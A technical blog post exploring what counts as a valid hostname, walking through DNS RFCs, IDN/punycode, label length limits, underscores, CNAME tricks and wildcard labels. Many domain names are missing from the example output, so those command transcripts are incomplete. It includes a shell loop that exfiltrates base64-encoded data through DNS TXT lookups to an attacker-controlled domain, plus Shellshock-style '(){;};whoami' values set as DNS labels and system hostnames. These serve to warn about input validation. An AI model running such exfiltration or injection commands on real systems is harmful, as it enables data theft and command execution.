Signs of Triviality

Opinions, mostly my own, on the importance of being and other things.
[homepage]  [blog]  []  [@jschauma]  [RSS]

What's in a hostname?

October 18, 2021

Hello, my hostname is... undefined. I think a lot of people on the internet are wrong. In particular (well, this time, anyway), about what is and isn't valid to use in a "hostname". Yes, yes, xkcd 386, but still, humor me, will ya?

Just about everywhere you look, people will tell you that a valid hostname consists only of the characters a-z, numbers, and hyphens ("-"), but that they can't start or end with a hyphen. So you start putting together a regular expression along the lines of:


Now, as the famous saying goes, you have (at least) two problems:

DNS names are case-insensitive, so and wWw.NeTmEiStEr.OrG are equivalent:

$ host is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900
$ host wWw.NeTmEiStEr.OrG is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900

And in my zone file, I can create labels using upper or lower case characters, and a lookup for either will yield all matching results:

$ grep ^[bB]
b       IN      A
b       IN      AAAA    2001:db8:b::1
B       IN      A
B       IN      AAAA    2001:db8:b::2
$ host has address has address has IPv6 address 2001:db8:b::2 has IPv6 address 2001:db8:b::1
$ host has address has address has IPv6 address 2001:db8:b::2 has IPv6 address 2001:db8:b::1

(This, by the way, is why you need to normalize e.g., hostnames in client certificates, SNIs, or Host: headers, especially when using those in an authorization context.)

But ok, adding A-Z to the regex isn't hard. But we also have to account for special cases involving hyphens. Common wisdom tells us we can't have a hostname start or end with a hyphen, but what about multiple successive hyphens? Let's give it a try:

$ host has address has IPv6 address 2001:db8:53::7

Hey, that works. But... wait a second, RFC5891 (2010), which adds support for Internationalized Domain Names (IDNs) in the DNS notes:

The Unicode string MUST NOT contain "--" (two consecutive hyphens) in the third and fourth character positions and MUST NOT start or end with a "-" (hyphen).

Remember IDNs? Those are used in the DNS to represent names using non-ascii alphabets, but are actually written into the DNS using punycode. Punycode uses the ASCII Compatible Encoding (ACE) prefix "xn--", which... makes things really messy:

"ä" is an IDN with punycode representation "". Your browser or an HTTP client like e.g., curl(1) may automatically translate ä to xn--4ca for you, so will not actually issue a DNS lookup for "ä", but for "". Likewise for, say, 💩 / xn--ls8h.

But not all Unicode Code Points are necessarily allowed in IDNs (see RFC5892); ä (00E4) is allowed, 💩 (1F4A9) is not. Never mind that despite it violating RFC5892, the domain 💩.la exists, got a TLS certificate from Let's Encrypt, and can be reached via your browser; it merely shows that registrars and clients do not necessarily or consistently implement this check.

Now your browser is likely to take "ä", translate it to "" and then perform a DNS lookup, but a command-line lookup would try "ä" and fail:

$ host has address has IPv6 address 2001:db8:53::7
$ host ä
host ä not found: 3(NXDOMAIN)
$ host has address has IPv6 address 2001:db8:53::6
$ host 💩
Host 💩 not found: 3(NXDOMAIN)

curl(1), for example, may behave differently depending on the version or how it was built:

# successful conversion to
$ curl -v -I http://ä 
*   Trying


$ curl -I http://ä.valid.dns.netmeister.or
curl: (3) Failed to convert ä to ACE; could not convert string to UTF-8

As we observe, on successful conversion of the IDN into punycode we get a xn---prefixed DNS label name, which is why we don't want any names with two hyphens in the third and fourth position. bind9 let us do that anyway, but to generate a valid label, we might create names like this:

$ host has address has IPv6 address 2001:db8:1:2:3:4:5:678

Oooookay then. That's pretty long. Can you just... do that? Is there no limitation on the length of a hostname?

There is. But it's complicated: When matching "hostnames", we're often more interested in fully-qualified domain names, which consist of multiple DNS labels. Each of those has a length restriction, while we also have a total maximum length of the FQDN. Specifically, the DNS limitations are spelled out in RFC1035 from 1987:

Various objects and parameters in the DNS have size
limits.  They are listed below.  Some could be easily
changed, others are more fundamental.

labels          63 octets or less
names           255 octets or less

So in addition to the initial examples of "valid hostnames", the following would also need to be matched correctly:

# A single label cannot be longer than 63 octets:
$ host has address has IPv6 address 2001:db8:dead:f1ea::1

# But you can have many labels so long as the FQDN is <= 255 octets:
$ host
has address
has IPv6 address 2001:db8:0:1:2:3:4:5

With 63 octets per label and 253 total bytes in the FQDN, you can see how you can then use DNS lookups for data exfiltration:

$ for label in $(base64 <payload | fold -w 200 | sed -e 's/.\{63\}/&./g'); do
        dig txt $label.yourdomain

On the authoritative DNS server you control, simply reconstruct the original data from the DNS lookups. Nice. But back to the question of what makes a "valid hostname"...

Trying to encode all of the above so far in a regular expression becomes silly quickly, and is thus left as an exercise for those who enjoy copying code from Stackoverflow without fully understanding what it does. But ok, let's stick with the basic rule of only allowing [a-z0-9-], meaning we're talking about an individual DNS label. Where did people pick up the rules about only allowing [a-z0-9-]?

The canonical citation for this restriction remains RFC952, which dates back to 1985 (and thus predates the DNS itself). In fact, RFC952 is entitled "DOD INTERNET HOST TABLE SPECIFICATION", providing a lexical grammar for entries of type NET, GATEWAY, HOST, and DOMAIN:

<hname> ::= <name>*["."<name>]
<name>  ::= <let>[*[<let-or-digit-or-hyphen>]<let-or-digit>]


The domain system allows a label to contain any 8-bit character. Although the domain system has no restrictions, other protocols such as SMTP do have name restrictions. Because of other protocol restrictions, only the following characters are recommended for use in a host name (besides the dot separator):

        "A-Z", "a-z", "0-9", dash and underscore

The DNS "DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION" RFC1035 (1987) states that "when creating a new host name, the old rules for HOSTS.TXT should be followed.", and RFC1123 (1989) updates RFC952 to allow hostnames to start with a letter or a digit, but that's about it. RFC1912 (1996) similarly suggests as much:

Allowable characters in a label for a host name are only ASCII letters, digits, and the `-' character. Labels may not be all numbers, but may have a leading digit (e.g., Labels must end and begin only with a letter or digit. [...] The presence of underscores in a label is allowed in [RFC 1033], except [RFC 1033] is informational only and was not defining a standard.

Ergo: hostnames MUST match only [a-z0-9-], right? Well, fun fact: RFC1912 is also only informational, but ok, then RFC952/RFC1123 still holds. But then why do we even have so many questions about what makes a valid hostname?

Now that appears to have its origin in Microsoft Windows's use of NetBIOS, which defines "NetBIOS computer names" in RFC1001 as 16 bytes (though Microsoft only allows 15 bytes, using the last byte to encode the devices functionality), and which does allow, for example, spaces as well as the underscore ("_") (see e.g., AD naming conventions). Now even in the days of Windows NT people apparently understood that spaces in names can complicate things, so replacing spaces with underscores appears to have been a popular approach: "MY COMPUTER" becomes "MY_COMPUTER".

But while a NetBIOS "computer name" is not a hostname, you do need one of those to communicate with other hosts on the internet (i.e., outside of NetBIOS), and so you end up with people trying to add their NetBIOS "computer names" into the DNS, have their software or name server reject the name due to an invalid character, and then go and ask on Stackoverflow what the set of valid characters for a hostname is. Which is how we got here.

But... is an underscore an invalid character in a hostname? It's pretty clear from, say, SRV or TLSA records and the widespread use of DKIM that the DNS has no problem with them:

$ dig +short tlsa
3 1 1 2D2379261544C9841025CE4F728F7D4D5A00E9B0B1EF2B1E2EEBBED7 B1843543
$ dig +short txt
YiLFpZ0VGvz1ufZLVWKuOF1iKJOF/rDjzehyNK2CkJscPzcuMV6zMQyxiEOOPl4Pkugd4G27G4klqLK9TZ   \

In fact, many modern nameservers use the underscore to implement DNS Query Name Minimisation (RFC7816) using exactly underscores as the left-most label, so clearly the underscore is a valid character -- for a DNS label, at least.

So what's the set of valid characters for a DNS label that's not a hostname? Aside from the "informational" RFCs noted above, RFC2181 provided a few important "Clarifications to the DNS Specification" back in 1997:

Occasionally it is assumed that the Domain Name System serves only the purpose of mapping Internet host names to data, and mapping Internet addresses to host names. This is not correct, the DNS is a general (if somewhat limited) hierarchical database, and can store almost any kind of data, for almost any purpose.

The DNS itself places only one restriction on the particular labels that can be used to identify resource records. That one restriction relates to the length of the label and the full name. The length of any one label is limited to between 1 and 63 octets. A full domain name is limited to 255 octets (including the separators). [...] Those restrictions aside, any binary string whatever can be used as the label of any resource record. Similarly, any binary string can serve as the value of any record that includes a domain name as some or all of its value (SOA, NS, MX, PTR, CNAME, and any others that may be added).

Oh, look at that: "any binary string whatever can be used as the label of any resource record." That includes the underscore. But even though a DNS label (and RDATA, incidentally) can contain just about anything, the above history has lead to DNS implementations applying different rules to labels that function as "hostnames" -- specifically, labels for resource records of type A, AAAA, and MX, as well as for RDATA of types NS, SOA, MX, and SRV (at least):

$ grep -n ^_
53: _       IN      TXT     "no query minimization here"
70: _       IN      A
$ named-checkzone bad owner name (check-names)
zone loaded serial

Note that named-checkzone did not complain about the TXT record on line 53, and so that is indeed a valid DNS label:

$ dig +short txt
"no query minimization here"

In other words, we can use all sorts of characters for records of other types, notably include CNAME records:

$ host is an alias for is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900

Now this makes things interesting, because virtually everybody considers a CNAME to be a "hostname", and FQDNs that are CNAMEs end up in all sorts of places where we assume they are hostnames. But note also that RFC2181 stresses:

Implementations of the DNS protocols must not place any restrictions on the labels that can be used. In particular, DNS servers must not refuse to serve a zone because it contains labels that might not be acceptable to some DNS client programs. A DNS server may be configurable to issue warnings when loading, or even to refuse to load, a primary zone containing labels that might be considered questionable, however this should not happen by default.

And so -- ignoring the discussion of what should or shouldn't be a "default" -- we can instruct e.g., bind9 to simply not complain about so-called "invalid" names, since we have already established that, outside of the length restriction, there really is no such thing. And then:

# A "hostname" must not start with a hyphen:
$ dig +short aaaa -q ""

# ...nor end with a hyphen:
$ dig +short aaaa

# MX records should not allow special characters like '@'
$ dig +short mx

# You can't quote the ., but you sure can make it look like you can:
$ host "'.'"
'.' has address
'.' has IPv6 address 2001:db8:fa4e::8

# In fact, all bets are off:
$ dig +short "¯\_(ツ)_/¯"
$ dig +short aaaa "¯\_(ツ)_/¯"

With check-names disabled, we can then also create a label with a literal non-punycode IDN / emoji, thereby allowing tools like host(1) and dig(1) to work:

$ host ä                    
\195\131\194\ has address
\195\131\194\ has IPv6 address 2001:db8:fa4e::11
$ host 💩                   
\195\176\194\159\194\146\194\ has address
\195\176\194\159\194\146\194\ has IPv6 address 2001:db8:fa4e::10

This still feels like cheating, though, because we had to explicitly disable check-names in our bind9 configuration file. But remember that anything that's "invalid" for "hostnames" (as in A and AAAA records) still is valid for CNAME records. So all of the following shenanigans will work and are entirely "valid":

$ host ''\ is an alias for is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900
$ host "¯\_(ツ)_/¯"
\195\130\194\175_\(\195\163\194\131\194\132\)_/\195\130\194\ is an alias for has address has IPv6 address 2001:db8:1::1
$ host  '$'
\$ is an alias for has address has IPv6 address 2001:db8:1::1
$  host '(){;};'
\(\){\;}\; is an alias for has address has IPv6 address 2001:db8:1::1

"But those aren't hostnames!", you say. Which... is true. But they're used as hostnames and used in a hostname context for all intents and purposes. Which of course makes things like (){;};whoami particularly dangerous -- remember Shellshock? Setting a "hostname" via DHCP was exactly one such scenario. And what exactly is a "hostname" supposed to be, anyway?

A "hostname" can mean many different things (as noted in RFC7719). It may refer to a DNS label of an A or AAAA record, it may refer to a complete FQDN, or it may be "the left-most label of a FQDN". And this distinction between "the left-most component of a FQDN" and a FQDN is important even if you stick to all common definitions of "validity". For example, consider the hostname 0xcafe, which clearly matches ^[a-zA-Z0-9-]+$:

$ grep domain /etc/resolv.conf
domain # save ourselves some typing
$ host 0xcafe has address has IPv6 address 2001:db8:cafe:cafe:cafe:cafe:cafe:c0fe
$ ping 0xcafe
PING 0xcafe ( 56 data bytes

Since 0xcafe is not a FQDN, our host(1) command will append But ping(1) says "Hey, that's just a hex number, let me pretend it's an IP address and ping that instead.". Yay!

But... isn't a "hostname" in the end whatever the hostname(1) command returns (depending on your Unix flavor using either the -s flag or as a default)? And shouldn't that define what is and isn't "valid"?

Well, guess what: the hostname(1) command itself may not enforce any restrictions on what you set your system's hostname to. Even if your hostname(1) does, your sethostname(2) probably does not:

# NetBSD:
$ sudo hostname _invalid
$ hostname _invalid
$ sudo hostname " "
$ hostname
$ sudo hostname '(){;};whoami'
$ hostname

# Linux
$ sudo hostname _invalid
hostname: the specified hostname is invalid
$ sudo sysctl -w kernel.hostname=_invalid
kernel.hostname = _invalid
$ hostname
$ echo '(){;};whoami' | sudo tee /proc/sys/kernel/hostname 
$ hostname

Oh, and one last thing: * is a valid character for a DNS label, and so indeed a valid hostname (per RFC2181), but in bind9 it also functions as a wildcard, matching any names that you do not have explicitly set in the zone. And that matches * itself:

$ host $(tr -dc '[:print:]' </dev/urandom | head -c 12)
[?3ft0ds&] has address
[?3ft0ds&] has IPv6 address 2001:db8::c2de:2d22:5ca1:2727
$ host *
* has address
* has IPv6 address 2001:db8::c2de:2d22:5ca1:2727

So with that, I can get myself a wildcard TLS certificate for * and serve that from http://* (although it will depend on your client whether or not it correctly interprets this hostname):

$ curl -v -I https://*
*   Trying 2001:470:30:84:e276:63ff:fe72:3900:4443...
* Connected to * (2001:470:30:84:e276:63ff:fe72:3900) port 4443 (#0)
* SSL connection using TLSv1.2 / AES256-GCM-SHA384
* Server certificate:
*  subject: CN=*
*  subjectAltName: host "*" matched cert's "*"
*  SSL certificate verify ok.
> HEAD / HTTP/1.1
> Host: *
< HTTP/1.1 200 OK

Safari has no problem visiting that site, but Firefox and Chrome both treat https://* as an invalid URL, so default to searching the internet instead. Web servers similarly may not correctly handle a Host: * header: Apache appears to not extract the host from the header and will throw a 400 Bad Request, while e.g., bozohttpd has no problem serving the request:

Screenshot of Safair connecting to

So... what does valid mean in the context of "hostnames"? It seems like we haven't made made much progress since the beginning of this blog post. I guess the best we can do is draw the distinction between RFC-valid and "probably not a good idea":

  • ^[a-zA-Z0-9-]+$ is not correct to match "valid" hostnames
  • "_" is a valid character in a hostname, but so are !@#$%^&*(){};.

    It still isn't a good idea to use those characters in a DNS label for an A or AAAA record, and in fact many libraries and applications will reject them.
  • As we've seen, you can stuff anything into the DNS and be technically correct, but that doesn't help you in reality.
  • However, you should never assume that whatever comes back from a DNS lookup or what might show up in a CNAME or anywhere else matches whatever you think is "valid".
  • You can spend a surprising amount of time chasing RFCs and finding out more than you ever thought you'd need to know about something as trivial as "hostnames".

The Internet is a Playground, the DNS a never-ending source of entertainment and astonishment, and hostnames... largely undefined.

"'Tis but thy name that is my enemy;
Thou art thyself, though not a Host.
What's Host? It is nor port, nor service,
Nor stack, nor app, nor any other part
Belonging to a system. O, be some other name!
What's in a name? That which we call a site
By any other name would fail as quick;
" -- DevOps Juliet

October 18, 2021

Related Links:

Previous: [There is no 'printf'.]  -- Next: [IPv4 addresses are silly, inet_aton(3) doubly so.]
[homepage]  [blog]  []  [@jschauma]  [RSS]